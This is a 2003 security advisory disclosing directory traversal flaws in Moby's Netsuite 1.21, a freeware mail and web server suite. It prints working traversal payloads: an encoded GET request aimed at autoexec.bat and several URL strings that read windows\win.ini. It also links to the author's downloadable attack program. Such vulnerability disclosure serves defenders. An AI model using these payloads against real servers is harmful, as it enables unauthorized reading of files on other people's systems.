Moby's Netsuite 1.21 Traversal Directory bugs Release Date: 13 July, 2003 Description: NetSuite is a freeware server suite that allows anyone with a static IP address the ability to run their own mail and web services. Note that you cannot reasonably run a web server from a normal dial-in account. Netsuite is designed for complete simplicity -- requiring only a few minutes to setup with no prior network skills or experience, and requires virtually no memory or processor time. General Windows file management and an understanding of the Internet is required. There are two sections: Moby Mail and Moby Web. Both are very direct to install and use, requiring only few minutes to begin using. Full source code for Microsoft Visual C++ 6.0 is available on the web. There exists some directory traversal vulnerabilities that allow someone to download or read files outside the web folder. In order for this attack to work we have to use some HTML characters instead of normal one. The attack: GET / HTTP/1.1 Host: /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat In our example above we want to see the file autoexec.bat. ***The folder /error/ doesn't exist in my Pc:P ehhe Other attack strings: http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin.ini http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin%2eini http://127.0.0.1/\..\..\..\windows\win.ini While i was searching i found about 25 attack string.This is only a small sample above. The Attack Program: I have created a sample attack program for Moby's Netsuite 1.21(possibly it for all versions of Moby's Netsuite ). You can get it from here: http://members.lycos.co.uk/r34ct/main/Netsuite_expl/ Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Feedback Please send suggestions, updates, and comments to: Dr_insane dr_insane@pathfinder.gr http://members.lycos.co.uk/r34ct/